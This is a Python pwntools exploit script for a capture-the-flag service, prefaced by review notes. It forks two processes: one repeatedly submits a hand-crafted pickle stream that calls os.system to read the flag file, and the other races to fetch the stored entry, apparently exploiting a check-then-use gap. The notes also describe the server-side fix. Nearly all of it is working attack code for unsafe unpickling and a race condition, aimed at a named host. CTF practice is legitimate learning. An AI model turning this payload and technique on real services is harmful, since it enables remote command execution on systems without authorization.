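"""Two-process pwntools client for a CTF service (writer/reader race).

The parent process repeatedly opens a session, picks menu option "1" twice
and submits, under the entry name "bomb", a hand-written protocol-0 pickle
stream. The child process repeatedly opens a session, picks option "0"
twice, requests "bomb" and stops as soon as the first reply line does not
contain "[ERROR]".

Review notes (the server code is not visible here, so these are hedged):
  * The submitted body only has an effect if the service passes stored,
    client-controlled bytes to ``pickle.load``/``pickle.loads``. Unpickling
    runs the callables named in the stream, so the server-side fix is a
    data-only format (e.g. JSON) or an ``Unpickler.find_class`` allow-list.
  * Running the two roles concurrently suggests the service checks the entry
    in one step and uses it in a later one; presumably a check-then-use gap
    on shared state. Confirm against the challenge source.
"""
from pwn import *
from os import fork, getpid, kill
from signal import SIGKILL

HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25653
PAYLOAD = "cat /home/ctf/flag"


def _open_entry(conn, choice):
    """Send the session preamble shared by both roles.

    Answers the first ``:`` prompt with "didas" (presumably a user name),
    answers two ``>>>`` menu prompts with ``choice``, then answers the next
    ``:`` prompt with the entry name "bomb".
    """
    conn.sendlineafter(b":", b"didas")
    conn.sendlineafter(b">>>", choice)
    conn.sendlineafter(b">>>", choice)
    conn.sendlineafter(b":", b"bomb")


def _writer_loop():
    """Submit the pickle stream under "bomb" over and over, one session each."""
    while True:
        conn = remote(HOST, PORT)
        try:
            _open_entry(conn, b"1")
            conn.recvuntil(b":")
            # Protocol-0 pickle, one opcode group per line:
            # GLOBAL os.system / MARK + STRING / TUPLE, REDUCE, STOP.
            conn.sendline(b"cos")
            conn.sendline(b"system")
            conn.sendline(("(S'" + PAYLOAD + "'").encode('utf-8'))
            conn.sendline(b"tR.")
            # Trailing blank lines; presumably they end the multi-line input.
            conn.sendline(b"\n\n\n")
        finally:
            conn.close()


def _reader_loop(writer_pid):
    """Request "bomb" until the reply is not an error, then stop the writer.

    Args:
        writer_pid: PID of the process running ``_writer_loop``.
    """
    while True:
        conn = remote(HOST, PORT)
        try:
            _open_entry(conn, b"0")
            res = conn.recvline().decode('utf-8')
        finally:
            # The original never closed reader sessions, leaking one socket
            # (and one server-side connection) per failed attempt.
            conn.close()
        if "[ERROR]" not in res:
            print(res)
            kill(writer_pid, SIGKILL)
            break


def main():
    """Fork: the parent runs the writer loop, the child runs the reader loop."""
    # Captured before fork() because the child sees fork() return 0; the
    # original passed that 0 to kill(), which signals the caller's whole
    # process group instead of just the writer.
    writer_pid = getpid()
    if fork() != 0:
        _writer_loop()
    else:
        _reader_loop(writer_pid)


if __name__ == "__main__":
    main()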